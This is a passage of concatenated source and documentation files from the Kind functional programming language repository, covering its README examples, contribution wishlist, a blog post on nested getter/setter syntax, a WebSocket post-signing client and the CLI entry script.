let val = MyType.foo([1,2,3], "Hello", MyType.bar)
// Converts to string
let str = Stringifier.run!(MyType.stringifier, val)
IO.print("str: " | str)
// Parses string to a value
let val = Parser.run!(MyType.parser, str) <> MyType.bar
// Serializes to bits
let bts = Serializer.run!(MyType.serializer, val)
IO.print("bts: " | Bits.show(bts))
// Deserializes to a value
let val = Deserializer.run!(MyType.deserializer, bts) <> MyType.bar
// Converts to string again
let str = Stringifier.run!(MyType.stringifier, val)
IO.print("str: " | str)
}
```
### Kind 1.0.51
- Inference on numeric literals and binary operators. Check `SYNTAX.md`.
- Many bugfixes
### Kind 1.0.46
- New syntax to create, get and set attributes of records
```
type Foo {
new(x: Nat, y: Nat)
}
Test: _
let foo = {1,2} // same as `Foo.new(1,2)`
let x = foo@x // same as `case foo { new: foo.x }`
let bar = foo@y <- 80 // same as `case foo { new: Foo.new(80,foo.y) }`
bar
```
<file_sep>/bin/scm/Makefile
# choose whether to use kind or kind-scm for bootstrapping
KIND := kind-scm
PREFIX := /usr/local/bin/
CHEZ-EXE := compile-chez-program
all: bin/kind-scm
deb: kind-scm.deb
# compiles kind files to scheme
# do this after modifying the compiler source-code
bootstrap:
cd ../../base && $(KIND) Kind.Comp.Target.Scheme.bootstrap --run
clean:
rm src/*.wpo
rm src/*.so
rm src/*.chez
rm src/*.generated.c
rm bin/*
bin/kind-scm:
$(CHEZ-EXE) --full-chez --libdirs src --optimize-level 2 src/main.scm
mv src/main bin/kind-scm
chmod +x bin/kind-scm
kind-scm.deb: bin/kind-scm
mkdir -p kind-scm_1.0.1-0_amd64/usr/local/bin/
cp bin/kind-scm kind-scm_1.0.1-0_amd64/usr/local/bin/
dpkg-deb --root-owner-group --build kind-scm_1.0.1-0_amd64/ bin/kind-scm_1.0.1-0_amd64.deb
install: bin/kind-scm
chmod +x bin/kind-scm
cp bin/kind-scm $(PREFIX)
test:
echo $(PREFIX)
<file_sep>/README.md
# Kind
A minimal, efficient and practical programming language that aims to rethink functional programming from scratch, and make it right. Under the hood, it is basically Haskell, except without historical mistakes, and with a modern, consistent design. On the surface, it aims to be more practical, and to look more like conventional languages. Kind is statically typed, and its types are so powerful that you can prove mathematical theorems in it. Compared to proof assistants, Kind has:
1. The smallest core. Check [FormCore.js](https://github.com/moonad/FormCoreJS/blob/master/FormCore.js) or [Core.kind](https://github.com/uwu-tech/Kind/blob/master/base/Kind/Core.kind). Both are `< 1000-LOC` complete implementations!
2. Novel type-level features. Check [this article](https://github.com/uwu-tech/Kind/blob/master/blog/1-beyond-inductive-datatypes.md) on super-inductive datatypes.
3. An accessible syntax that makes it less scary. Check [SYNTAX.md](https://github.com/uwu-tech/Kind/blob/master/SYNTAX.md).
4. A complete bootstrap: the language is implemented in itself. Check it [here](https://github.com/uwu-tech/Kind/tree/master/base/Kind).
5. Efficient real-world compilers. Check [http://uwu.tech/](http://uwu.tech) for a list of apps. (WIP)
Usage
-----
 [](https://t.me/formality_lang)
0. Choose a release. We'll use JavaScript here but ChezScheme is also [available](/INSTALL.md).
1. Install Kind using `npm`:
```bash
npm i -g kind-lang
```
2. Save the file below as `Main.kind`:
```javascript
Main: IO(Unit)
IO {
IO.print("Hello, world!")
}
```
3. Type-check it:
```bash
kind Main
```
4. Run it:
```bash
kind Main --run
```
5. Have fun!
Things you can do with Kind:
----------------------------
### Compile programs and modules to several targets.
Kind has a universal compiler that targets several back-ends. Just find what you need in Kind, and compile it with `kind Main --lang`. For example, to generate a QuickSort function in JavaScript, just type `kind List.quicksort --js`. You may never write code in any other language! Available targets: `--js`, `--scm`. Several more will be available eventually.
### Create live applications.
Kind has an interconnected back-end that allows you to create rich, interactive applications without ever touching databases, TCP packets, or APIs. Just add a file to `base/App` and it will be available on [http://uwu.tech/](http://uwu.tech). You can fork entire applications - not just the front-end, but all of it, back-end, database, and networking - in seconds.
### Prove theorems.
No, theorems are not scary things mathematicians do. For programmers, they're more like unit tests, except they can involve symbols, allowing you to cover infinitely many test cases. If you like unit tests, you'll love theorems. To learn more, check [THEOREMS.md](THEOREMS.md). You can also compile Kind programs and proofs to a minuscule core language with the `--fmc` flag (example: `kind Nat.add.assoc --fmc`). Try it!
### Deploy Smart-Contracts.
(Soon.)
Examples
--------
### Some programs
```javascript
// A 'Hello, world!"
Main: IO(Unit)
IO {
IO.print("Hello, world!")
}
```
```javascript
// Quicksort (using recursion)
quicksort(list: List<Nat>): List<Nat>
case list {
nil:
[]
cons:
fst = list.head
min = filter!((x) x <? list.head, list.tail)
max = filter!((x) x >=? list.head, list.tail)
quicksort(min) ++ [fst] ++ quicksort(max)
}
```
```javascript
// List iteration (using folds)
some_text: String
List.foldl!!("",
(str, result)
str = String.to_upper(str)
str = String.reverse(str)
result | str,
["cba","fed","ihg"])
```
```javascript
// List iteration (using fors)
some_text: String
result = ""
for str in ["cba","fed","ihg"] with result:
str = String.to_upper(str)
str = String.reverse(str)
result | str
result
```
```c
// Map, Maybe, String and Nat sugars
sugars: Nat
key = "toe"
map = {"tic": 1, "tac": 2, key: 3} // Map.from_list!([{"tic",1}, ...])
map = map{"tic"} <- 100 // Map.set!("tic", 100, map)
map = map{"tac"} <- 200 // Map.set!("tac", 200, map)
map = map{ key } <- 300 // Map.set!(key, 300, map)
val0 = map{"tic"} <> 0 // Maybe.default!(Map.get!("tic",map), 0)
val1 = map{"tac"} <> 0 // Maybe.default!(Map.get!("tac",map), 0)
val2 = map{ key } <> 0 // Maybe.default!(Map.get!(key, map), 0)
val0 + val1 + val2 // Nat.add(val0, Nat.add(val1, val2))
```
```c
// List monadic block: returns [{1,4},{1,5},{1,6},{2,4},...,{3,6}]
my_list: List<Pair<Nat,Nat>>
List {
get x = [1, 2, 3]
get y = [4, 5, 6]
return {x, y}
}
```
Check many List algorithms on [base/List](https://github.com/uwu-tech/Kind/tree/master/base/List)!
### Some types
```javascript
// A boolean
type Bool {
true
false
}
```
```javascript
// A natural number
type Nat {
zero
succ(pred: Nat)
}
```
```javascript
// A polymorphic list
type List <A: Type> {
nil
cons(head: A, tail: List<A>)
}
```
```javascript
// A polymorphic pair
type Pair <A: Type, B: Type> {
new(fst: A, snd: B)
}
```
```javascript
// A polymorphic dependent pair
type Sigma <A: Type, B: A -> Type> {
new(fst: A, snd: B(fst))
}
```
```javascript
// A polymorphic list with a statically known size
type Vector <A: Type> ~ (size: Nat) {
nil ~ (size = 0)
cons(size: Nat, head: Nat, tail: Vector<A,size>) ~ (size = 1 + size)
}
```
```javascript
// A bounded natural number
type Fin ~ <lim: Nat> {
zero<N: Nat> ~ (lim = Nat.succ(N))
succ<N: Nat>(pred: Fin<N>) ~ (lim = Nat.succ(N))
}
```
```javascript
// The type used in equality proofs
type Equal <A: Type, a: A> ~ (b: A) {
refl ~ (b = a)
}
```
```javascript
// A burrito
type Monad <M: Type -> Type> {
new(
bind: <A: Type, B: Type> M<A> -> (A -> M<B>) -> M<B>
pure: <A: Type> A -> M<A>
)
}
```
```javascript
// Some game entity
type Entity {
player(
name: String
pos: V3
health: Nat
items: List<Item>
sprite: Image
)
wall(
hitbox: Pair<V3, V3>
collision: Entity -> Entity
sprite: Image
)
}
```
Check all core types on [base](https://github.com/uwu-tech/Kind/tree/master/base)!
### Some proofs
```javascript
// Proof that `a == a + 0`
Nat.add.zero(a: Nat): a == Nat.add(a, 0)
case a {
zero: refl
succ: apply(Nat.succ, Nat.add.zero(a.pred))
}!
```
```javascript
// Proof that `1 + (a + b) == a + (1 + b)`
Nat.add.succ(a: Nat, b: Nat): Nat.succ(a + b) == (a + Nat.succ(b))
case a {
zero: refl
succ: apply(Nat.succ, Nat.add.succ(a.pred, b))
}!
```
```javascript
// Proof that addition is commutative
Nat.add.comm(a: Nat, b: Nat): (a + b) == (b + a)
case a {
zero:
Nat.add.zero(b)
succ:
p0 = Nat.add.succ(b, a.pred)
p1 = Nat.add.comm(b, a.pred)
p0 :: rewrite X in Nat.succ(X) == _ with p1
}!
```
Check some Nat proofs on [base/Nat/add](https://github.com/uwu-tech/Kind/tree/master/base/Nat/add)!
### A web app
```javascript
// Render function
App.Hello.draw: App.Draw<App.Hello.State>
(state)
<div style={"border": "1px solid black"}>
<div style={"font-weight": "bold"}>"Hello, world!"</div>
<div>"Clicks: " | Nat.show(state@local)</div>
<div>"Visits: " | Nat.show(state@global)</div>
</div>
// Event handler
App.Hello.when: App.When<App.Hello.State>
(event, state)
case event {
init: IO {
App.watch!(App.room_zero)
App.new_post!(App.room_zero, App.empty_post)
}
mouse_down: IO {
App.set_local!(state@local + 1)
}
} default App.pass!
```
Source: [base/App/Hello.kind](https://github.com/uwu-tech/Kind/blob/master/base/App/Hello.kind)
Live: [http://uwu.tech/App.Hello](http://uwu.tech/App.Hello)
In order to run this or any other app, you should follow these steps:
- The app should be in `base/App` folder
- Install necessary packages in web folder with `npm i --prefix web/`
- Install `js-beautify` using `sudo npm i -g js-beautify`
- Run our local server with `node web/server`
- Build the app you want with `node web/build App.[name of app]` (in this example would be `node web/build App.Hello`)
- Open `localhost` in your favorite browser and see your app working
Future work
-----------
There are so many things we want to do and improve. Would like to contribute? Check [CONTRIBUTE.md](https://github.com/uwu-tech/Kind/blob/master/CONTRIBUTE.md). Also reach us on [Telegram](https://t.me/formality_lang). We're friendly!
<file_sep>/.github/ISSUE_TEMPLATE/support.md
---
name: ❓ Support
about: Get help using the language
---
To help future users with similar problems, please
[ask a question](https://stackoverflow.com/questions/tagged/kind-lang) on Stack
Overflow under the tag `kind-lang`. We are monitoring the tag
and will help you there.
<file_sep>/CONTRIBUTE.md
# Contributing
Want to contribute? Here are some things we need. If
you want to work on any of these, [contact us](http://t.me/formality_lang) for
instructions!
## Funding
We're self-funded. More funds = more devs = more cool features.
If you'd like to help with donations, grants or funding, obviously let us know (:
## Improve base
The best way to start contributing (and to get familiar with the codebase) is to
just add files to `base`. Kind's
[base](https://github.com/uwu-tech/Kind/tree/master/base) is in a constant state
of evolution. It has several functions that aren't well documented. Some
functions may have inconsistent names here and there. Some obvious functions may
be missing. Many data structures are missing. Find anything you can improve,
work on it and submit a PR. We'll be very happy to review it!
As an example, all the proofs on
[Nat/Add](https://github.com/uwu-tech/Kind/tree/master/base/Nat/add) were added
by Eloi (thanks!). That kind of contribution is always welcome!
## Improve the Numeric libraries
There are many missing numeric types on `Kind/base`, such as `I128`. The
existing types, such as `U32`, may also have missing functions here and there.
Additions are welcome!
## Implement missing Word algorithms
While Kind optimizes operations such as `I32.add` to native operations in its
back-ends, these operations still need to be implemented in pure Kind, for
theorem proving purposes. Since implementing these operations for every numeric
type would be repetitive, most of these are implemented on the `Word` type,
which represent N-bit values (for example, `I32` is a thin wrapper around
`Word<32>`, so `I32.add` just calls `Word.add<32>`). While many operations are
implemented, many are still missing. For example, all these operations are
TODOs:
```
Word.int.add
Word.int.mul
Word.int.sub
Word.int.mod
Word.int.div
Word.int.pow
Word.int.eql
Word.int.ltn
Word.int.lte
Word.int.eql
Word.int.gte
Word.int.gtn
Word.float.add
Word.float.mul
Word.float.sub
Word.float.mod
Word.float.div
Word.float.pow
Word.float.eql
Word.float.ltn
Word.float.lte
Word.float.eql
Word.float.gte
Word.float.gtn
```
Adding these would be great.
## Add another back-end
Are you a full-time JavaScript developer who doesn't like JavaScript? You can
just use Kind as your main language, compile it to JS with `kind Your.Term --js`
and import it with `require("Your.Term")`. Imagine being able to do that for
every language? Currently, Kind targets Scheme and JavaScript. We'd like more
backends, as many as possible. Adding a new back-end is somewhat simple: just
add its syntax on
[base/Kind/Comp/Target](https://github.com/uwu-tech/Kind/tree/master/base/Kind/Comp/Target)!
## Add a rich geometry library
We have some very primitive 3D vector operations, but not much else. For game
development purposes, it would be amazing to have a rich library of geometric
primitives, including matrices, quaternions, collisions, space partitioning
structures and so on. Adding these is always welcome!
## Add a WebGL renderer
Right now, the [DOM](https://github.com/uwu-tech/Kind/blob/master/base/DOM.kind)
type allows rendering text, HTML nodes and pixelated canvas. It would be amazing
to have a render mode that integrated with WebGL. If you'd like to work on that,
contact us for more instructions!
## Create apps
Sounds silly, but just creating apps using the `App` type would be amazing. Any
app added to `base/App` will show up on [http://uwu.tech/](http://uwu.tech).
Sadly, we don't have a tutorial on how apps work, but it should be learnable
from looking at the examples.
## Get rid of FormCoreJS
Right now, the JavaScript compiler on
[JavaScript.kind](https://github.com/uwu-tech/Kind/tree/master/base/Kind/Comp/Target)
is lackluster, compared to the one in
[FmcToJs.js](https://github.com/moonad/FormCoreJS/blob/master/FmcToJs.js). That
is why, when compiling to JS, instead of using the compiler written in Kind, we
compile to `FormCore`, and then use `FmcToJs.js`. Because of that, the Scheme
back-end will produce much worse JS code than the Node.js back-end, among other
issues. It would be nice to improve `JavaScript.kind` to make it as efficient as
`FmcToJs.js`, allowing us to get rid of the JavaScript dependency.
## Improve the pair syntax
There are many missing syntaxes. For example, we don't have a syntax for
quadruples, triples, only pairs. We also can't destruct triples, quadruples. We
also can't destruct pairs in function arguments, in loops. For example:
```
let {x,y,z} = my_vector
List.map(({x,y}) x + y, list)
let sum = for {x,y} in positions: x + y + sum
```
None of the syntaxes above is available yet. Deep and nested pairs aren't
available either. There are many syntaxes that aren't available or could be
improved. Working on that with us is always welcome (but please, ask before!)
## Improve the usage of the get/set syntaxes
The get/set syntaxes can't be chained. For example,
```
let list = list[2] <- 100
```
sets the element of index 2 on `list` to `100`. But
```
let list = list[2][2] <- 100
```
doesn't work as expected. It must be written as:
```
let list = list[2] <- (list[2][2] <- 100)
```
The same is the case for maps (`map{"x"} <- 2`) and records (`record@x <- 2`).
Adding these syntaxes would be nice.
Moreover, the following syntax would be nice to have:
```
let list[2] <- 100
```
This would be equivalent to:
```
let list = list[2] <- 100
```
## Improve the usability of map keys
Right now, when using maps, you need to explicitly convert your keys to strings.
For example:
```
map{U256.show(1234)} <- "entry"
```
It would be nice if we either improved maps to have polymorphic keys, or
improved the parser to automatically add these conversions, in the same way that
operators (like `+`) are polymorphic.
## Remove the need for parenthesis on forall's syntax
The "forall" syntax requires a parenthesis sometimes. For example:
```
foo: Type
((A: Type) -> A)
```
This shouldn't be the case and needs investigation.
## Add more generics
Right now, we can derive `serializer, deserializer, stringifier, parser` for types.
For example:
```
type MyType {
foo
bar
} deriving (stringifier, parser)
```
Derives `MyType.stringifier`, `MyType.parser`. It would be nice to also allow
deriving other functions such as `show, read, equal, lesser_than, greater_than,
serialize, deserialize`. Most of these are trivial. For example, `show` is just
a wrapper that could use `stringifier`, and `serialize` is just a wrapper that
could use `serializer`. Regardless, these are TODOs. Adding these would be
great.
## Add implicits
One of the main sources of verbosity in Kind is the lack of implicit arguments.
That is partly improved by holes and `!`. For example, `Pair.new` can be written
as `Pair.new<Nat,Nat>(1,2)`, or `Pair.new<_,_>(1,2)`, or `Pair.new!!(1,2)`. It
would be better to write just `Pair.new(1,2)`. It is not clear how to add implicit
arguments to Kind without making some undesirable compromises, but it would be
a great improvement.
## Re-add optimal evaluators
Past versions of Kind/Formality had an option to compile programs to optimal
λ-calculus evaluators, which allowed us to explore these, using the language
syntax. Sadly, this isn't available anymore. Re-adding would be amazing. In
order to do that, the shortest path would be to port the code in [this
repository](https://github.com/MaiaVictor/abstract-algorithm) to Kind.
## Implement an EVM compiler
Implement a compiler from the low-order, linear λ-calculus to the EVM. Doing so
is completely viable and will result in efficient smart-contracts. Once we have
this, plus linear types, Kind will be able to be used as a smart-contract
language. Contact us for more instructions.
## Add linear types
Adding linear types would allow us to separate the linear from the non-linear
subset of the language. That would bring several benefits.
1. **Mutable structures.** Right now, `base/Buffer8` is considered unsafe,
because it is optimized to use mutable buffers under the hood, on the JS
back-end. That means that, if you use it non-linearly, your program may
behave incorrectly. With linear types, we could apply the optimization only
when `Buffer8` is linear. Similarly, we could optimize arrays and maps to use
mutable datatypes when suitable.
2. **EVM compilation.** While we have managed to reduce the cost of
[beta-reduction](https://medium.com/@maiavictor/compiling-formality-to-the-evm-99aec75677dd)
to miraculous 200 gas, even that is still too much for the very expensive
environment of the Ethereum blockchain. Because of that, our best bet to
compile to EVM, right now, is to compile the linear, low-order subset of
Kind. That sounds lackluster, but it is actually pretty sufficient. That
means we'd be able to write smart-contracts using Kind's syntax. As long as
you don't do certain things (like using `List.map` or duplicating arguments),
it will work fine, it will be inexpensive, and it will compile to efficient
Ethereum contracts. But, for that, we need linearity.
3. **Compile to optimal λ-calculus evaluators.** We have done a lot of
experimentation with [optimal
λ-evaluators](https://medium.com/@maiavictor/solving-the-mystery-behind-abstract-algorithms-magical-optimizations-144225164b07)
in the past, but this isn't currently available. Adding linear types would allow
us to compile to optimal evaluators in a sound manner.
4. **Consistency/Termination checkers.** Adding linear types will make the job
of making a consistency checker easier. Check the section below.
Adding a linearity checker to the compiler isn't a PhD-level task, but it requires
some experience with functional programming, a lot of patience and knowledge
about our type checker. Contact us if you are interested!
## Add a consistency checker
Compared to other proof languages, kind takes an inverted approach. Instead of
consistency being default and expressivity being opt-in (like Agda's
`type-in-type` pragma), here, expressivity is default and consistency is a
planned opt-in. That means you're allowed to write programs with no
restrictions, just like most traditional languages like Haskell or JavaScript,
as long as they're total and well-typed. But that also means programs that do
not halt, and logical paradoxes, aren't prohibited.
Regardless, there are several terminating, consistent subsets of Kind, each
admitting different kinds of programs. For example, with structural recursion,
we're allowed to have Agda-like proofs, but no `Type:Type`. Under elementary
affine logic, we're allowed to have `Type:Type`, but not certain forms of nested
loops. Adding checkers for different consistent subsets would be a nice feature.
For the end user, this could be presented as an icon when type-checking. For
example:
```
$ kind Nat.add
Nat.add: (n:Nat) (m:Nat) Nat ✓ ⊤
All terms check.
```
With `✓` standing for "well-typed" and `⊤` standing for "terminating".
## Research how to add HoTT features
While we have some interesting insights on the matter (check [this blog
post](https://github.com/uwu-tech/Kind/blob/master/blog/1-beyond-inductive-datatypes.md)),
Kind isn't capable of expressing the most important HoTT features. We could add
these inspired on Cubical Type Theory, but this would increase the size of
Kind's core by a few multipliers, which we don't want to. In special, the
`transp` function seems to account for most of that complexity. Investigating
how to add HoTT features without blowing up the core size is an interesting line
of research.
## Extend CONTRIBUTE.md
I'm currently adding items as I remember, so this list isn't complete right now.
If you have any improvement in mind, feel free to add here too!
<file_sep>/base/check.sh
kind Bits/
kind Nat/add/
kind Nat/div_mod/
<file_sep>/blog/3-getters-and-setters.md
Getters and Setters in Kind
===========================
The verbosity of nested fields
------------------------------
One of the most annoying aspects of pure functional programming is getting,
setting and mutating deeply nested fields. In impure languages like JavaScript,
this was never a problem. For example, consider the following object:
```javascript
let obj = {
name: "sample"
data: {
"a": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0]
"b": [7.0, 7.0, 7.0, 7.0, 7.0, 7.0]
}
}
```
Altering a nested field is easy:
```javascript
obj.data["a"][0] = 42.0
```
In Haskell, the equivalent code is very verbose. Lenses greatly improve the
situation, but they 1. have considerable runtime cost, 2. require big external
libraries, 3. can be overkill, 4. are still not as succinct as JS.
To be fair, the JavaScript version, while terse, is problematic. Not only
because it mutates the original object, but because, if any of the keys don't
exist, the program will crash. To make that program safe, one must make
several checks that end up making the code verbose too:
```javascript
var data = obj.data
if ( obj.data !== undefined
&& obj.data["a"] !== undefined
&& obj.data["a"][0] !== undefined) {
obj.data["a"][0] = 42.0
}
```
In [Kind](https://github.com/kind-lang/kind), the earlier versions of the
language suffered from a similar problem. The equivalent object could be
defined as:
```javascript
type Object {
new(
name: String
data: Map<List<F64>>
)
}
obj: Object
Object.new("sample", {
"a": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0]
"b": [7.0, 7.0, 7.0, 7.0, 7.0, 7.0]
})
```
And, like on most pure languages, altering nested fields was verbose:
```javascript
obj2: Object
case obj {
new: case Map.get!("a", obj.data) as got_list {
none: obj
some: case List.get!(0, got_list.value) as got_number {
none: obj
some: Object.new(obj.name, Map.set!("a", List.set!(0, 42.0, got_list.value), obj.data))
}
}
}
```
Kind-Lang's obvious solution
----------------------------
Since the last version, Kind features a built-in getter and setter syntax that
makes these operations succinct:
```javascript
new_obj: Object
obj@data{"a"}[0] <- 42.0
```
This small one-liner is equivalent to the huge case tree we had to write before.
It immutably alters the first number of `obj` to `42`. The way it works is
`x@field` focuses a field, `x{key}` focuses a Map entry, and `x[index]` focuses
a List element. These focusers can be chained to get deep fields:
```javascript
data: Map<List<F64>>
obj@data
nums: Maybe<List<F64>>
obj@data{"a"}
number: Maybe<F64>
obj@data{"a"}[0]
```
And, to set, just append a `<- new_val`. This will overwrite the focused field,
immutably. You can also use `<~` to apply a function instead:
```javascript
new_obj: Object
obj@data{"a"}[0] <~ F64.mul(2.0)
```
Note that, as expected, `Maybe` shows up only when needed, such as when getting
an element from a list or map. Finally, you can "mutate" an object in a JS-like
fashion by using a `let` expression together with an immutable setter:
```
let obj = obj@data{"a"}[0] <~ F64.mul(2.0)
```
This "mutation" is actually pure: the original `obj` wasn't changed, you just
made a new object with the same name. You can still access the old one by
writing `obj^`. This, in effect, does the same as a JS assignment operator:
```
obj.data["a"][0] *= 2.0
```
Except without mutability, without annoying checks, without runtime errors, with
strong types, and with the flexibility to use any function, instead of just `*`,
`+`, etc. To make it even more terse, the line above can be abbreviated as:
```
let obj@data{"a"}[0] <~ F64.mul(2.0)
```
And that's all! This desugars to an efficient, linear
[Form-Core](https://github.com/moonad/FormCoreJS) program that doesn't use heavy
lenses, and avoids re-getting nested fields.
Conclusion
----------
In short, dealing with nested fields in JavaScript looks nice but is terrible;
in Haskell, it looks terrible and is; in Kind, it is a joyful experience that
makes you proud of your career choice.
I'm making this post because this is such a huge, needed quality-of-life
improvement that I believe every pure language should come with something
similar out-of-the-box, and I don't understand why they make it so hard. You
shouldn't need huge third party libs to do something that fundamental.
Finally, note this is *not* a built-in lens implementation. Lenses are
first-class objects. Instead, it is just a baseline syntax for immutably
setting, getting and modifying nested values in records, lists and maps. And
that completely changes how the language feels.
<file_sep>/web/events/client.js
var lib = require("./lib.js");
var ethsig = require("nano-ethereum-signer");
var WebSocket = require("isomorphic-ws");
module.exports = function client({url = "ws://localhost:7171", key = "0000000000000000000000000000000000000000000000000000000000000001"} = {}) {
var ws = new WebSocket(url);
var Posts = {};
var watching = {};
// Waits ws to be ready and then sends buffer to server
function ws_send(buffer) {
if (ws.readyState === 1) {
ws.send(buffer);
} else {
setTimeout(() => ws_send(buffer), 20);
}
}
// Time sync variables
var last_ask_time = null; // last time we pinged the server
var last_ask_numb = 0; // id of the last ask request
var best_ask_ping = Infinity; // best ping we got
var delta_time = 0; // estimated time on best ping
var ping = 0; // current ping
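  // Time synchronization: the client periodically asks the server for its
  // clock (ask_time). Ping is estimated as half the round-trip time, and the
  // clock offset measured on the lowest-ping sample is kept in `delta_time`,
  // so `get_time()` returns `Date.now() + delta_time` as the best guess of
  // the server's current time.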
// User-defined callbacks
var on_init_callback = null;
var on_post_callback = null;
// Sets the on_init callback
function on_init(callback) {
on_init_callback = callback;
}
// Sets the on_post callback
function on_post(callback) {
on_post_callback = callback;
}
// Sends a signed post to a room on the server
function send_post(post_room, post_data, priv_key = key) {
var priv_key = lib.check_hex(256, priv_key);
var post_room = lib.check_hex(64, post_room);
var post_data = lib.check_hex(null, post_data);
var post_hash = ethsig.keccak("0x"+lib.hexs_to_bytes([post_room, post_data])).slice(2);
var post_sign = ethsig.signMessage("0x"+post_hash, "0x"+priv_key).slice(2);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.POST),
post_room,
post_data,
post_sign,
]);
ws_send(msge_buff);
};
// Starts watching a room
function watch_room(room_name) {
var room_name = room_name.toLowerCase();
if (!watching[room_name]) {
watching[room_name] = true;
var room_name = lib.check_hex(64, room_name);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.WATCH),
room_name,
]);
Posts[room_name] = [];
ws_send(msge_buff);
}
};
// Stops watching a room
function unwatch_room(room_name) {
var room_name = room_name.toLowerCase();
if (watching[room_name]) {
watching[room_name] = false;
var room_name = lib.check_hex(64, room_name);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.UNWATCH),
room_name,
]);
ws_send(msge_buff);
}
};
// Returns the best estimate of the server's current time
function get_time() {
return Date.now() + delta_time;
};
// Returns the best estimate of the server's current tick
function get_tick() {
return Math.floor((Date.now() + delta_time) / 62.5);
};
// Asks the server for its current time
function ask_time() {
last_ask_time = Date.now();
last_ask_numb = last_ask_numb + 1;
ws_send(lib.hexs_to_bytes([
lib.u8_to_hex(lib.TIME),
lib.u64_to_hex(last_ask_numb),
]));
};
ws.binaryType = "arraybuffer";
ws.onopen = function() {
if (on_init_callback) {
on_init_callback();
}
// Pings time now, after 0.5s, after 1s, and then every 2s
setTimeout(ask_time, 0);
setTimeout(ask_time, 500);
setTimeout(ask_time, 1000);
setInterval(ask_time, 2000);
};
ws.onmessage = (msge) => {
var msge = new Uint8Array(msge.data);
//console.log("receiving", msge);
if (msge[0] === lib.SHOW) {
var room = lib.bytes_to_hex(msge.slice(1, 9));
var tick = lib.bytes_to_hex(msge.slice(9, 17));
var addr = lib.bytes_to_hex(msge.slice(17, 37));
var data = lib.bytes_to_hex(msge.slice(37, msge.length));
//console.log("- room", room)
//console.log("- addr", addr)
//console.log("- data", data)
Posts[room].push({tick, addr, data});
if (on_post_callback) {
on_post_callback({room, tick, addr, data}, Posts);
}
};
if (msge[0] === lib.TIME) {
var reported_server_time = lib.hex_to_u64(lib.bytes_to_hex(msge.slice(1, 9)));
var reply_numb = lib.hex_to_u64(lib.bytes_to_hex(msge.slice(9, 17)));
if (last_ask_time !== null && last_ask_numb === reply_numb) {
ping = (Date.now() - last_ask_time) / 2;
var local_time = Date.now();
var estimated_server_time = reported_server_time + ping;
if (ping < best_ask_ping) {
delta_time = estimated_server_time - local_time;
best_ask_ping = ping;
}
}
};
};
return {
on_init,
on_post,
send_post,
watch_room,
unwatch_room,
get_time,
get_tick,
lib,
};
};
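// Example usage (a sketch; the relative path and the 16-hex-digit room id
// below are illustrative only, not part of the original module):
//
//   var client = require("./client.js")();
//   client.on_post((post) => console.log("new post:", post));
//   client.watch_room("0000000000000000");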
<file_sep>/.github/ISSUE_TEMPLATE/open_discussion.md
---
name: 💬 General discussion
about: Discuss anything that doesn't fit in the other categories
---
We sure want to hear what you have to say. Please tell us in our
`Discussions` tab. Currently issues deal exclusively with bugs or
feature requests.
<file_sep>/bin/js/src/main.js
#!/usr/bin/env -S node --stack-size=10000
var kind = require("./kind.js");
var fs = require("fs");
var fsp = require("fs").promises;
var path = require("path");
var exec = require("child_process").execSync;
var {fmc_to_js, fmc_to_hs} = require("formcore-js");
//var {fmc_to_js, fmc_to_hs} = require("./../../../../FormCoreJS");
// Locates the Kind/base dir and moves to it, or quits if it can't be found
var ADD_PATH = "";
function find_base_dir() {
var full_path = process.cwd();
var local_dir = fs.readdirSync(".");
var kind_indx = full_path.toLowerCase().indexOf("/kind/base");
if (kind_indx !== -1) {
if (kind_indx + 10 !== full_path.length) {
ADD_PATH = full_path.slice(kind_indx + 10).slice(1)+"/";
}
process.chdir(full_path.slice(0, kind_indx + 10));
//} else if (local_dir.indexOf("kind") !== -1) {
//process.chdir(path.join(full_path, "kind"));
//find_base_dir();
//} else if (local_dir.indexOf("Kind") !== -1) {
//process.chdir(path.join(full_path, "Kind"));
//find_base_dir();
} else if (local_dir.indexOf("base") !== -1 && full_path.slice(-5).toLowerCase() === "/kind") {
process.chdir(path.join(full_path, "base"));
find_base_dir();
//} else {
//console.log("# Kind "+require("./../package.json").version);
//console.log("Couldn't find Kind/base directory.\n");
//console.log("Go to the directory to run Kind commands or clone the repository:");
//console.log(" git clone https://github.com/uwu-tech/Kind");
//console.log("New files must be added inside Kind/base directory.");
//process.exit();
}
};
find_base_dir();
// Finds all .kind files inside a directory, recursivelly
async function find_kind_files(dir) {
try {
var files = await fsp.readdir(dir);
var found = [];
for (let file of files) {
var name = path.join(dir, file);
var stat = await fsp.stat(name);
if (stat.isDirectory()) {
var child_found = await find_kind_files(name);
for (let child_name of child_found) {
found.push(child_name);
}
} else if (name.slice(-5) === ".kind") {
found.push(name);
}
}
} catch (e) {
console.log("Not a directory: " + dir);
process.exit();
}
return found;
}
// Converts a JS Array to a Kind list
function array_to_list(arr) {
var list = {_: "List.nil"};
for (var i = arr.length - 1; i >= 0; --i) {
list = {_: "List.cons", head: arr[i], tail: list};
}
return list;
}
if (!process.argv[2] || process.argv[2] === "--help" || process.argv[2] === "-h") {
console.log("# Kind "+require("./../package.json").version);
console.log("");
console.log("Usage:");
console.log("");
console.log(" kind Module/ # type-checks a module");
console.log(" kind Module/file.kind # type-checks a file");
console.log(" kind full_term_name --run # runs a term using JavaScript");
console.log(" kind full_term_name --run-scm # runs a term using Chez Scheme");
console.log(" kind full_term_name --show # prints a term");
console.log(" kind full_term_name --norm # prints a term's λ-normal form");
console.log(" kind full_term_name --js # compiles a term to JavaScript");
console.log(" kind full_term_name --scm # compiles a term to Chez Scheme");
console.log(" kind full_term_name --fmc # compiles a term to FormCore");
console.log("");
console.log("Examples:");
console.log("");
console.log(" # Run the 'Main' term (outputs 'Hello, world'):");
console.log(" kind Main --run");
console.log("");
console.log(" # Type-check all files inside the 'Nat' module:");
console.log(" kind Nat/");
console.log("");
console.log(" # Type-check the 'Nat/add.kind' file:");
console.log(" kind Nat/add.kind");
console.log("");
console.log(" # Type-check the 'Nat.add' term:");
console.log(" kind Nat.add");
console.log("");
console.log(" # Compile the 'Nat.add' term to JavaScript:");
console.log(" kind Nat.add --js");
console.log("");
console.log(" # Print the λ-encoding of Nat:");
console.log(" kind Nat --show");
console.log("");
console.log(" # Print the λ-normal form of 2 + 2:");
console.log(" kind Example.two_plus_two --norm");
process.exit();
}
function is_file(name){
return name.slice(-5) === ".kind"
}
function display_error(name, error){
if(is_file(name)){
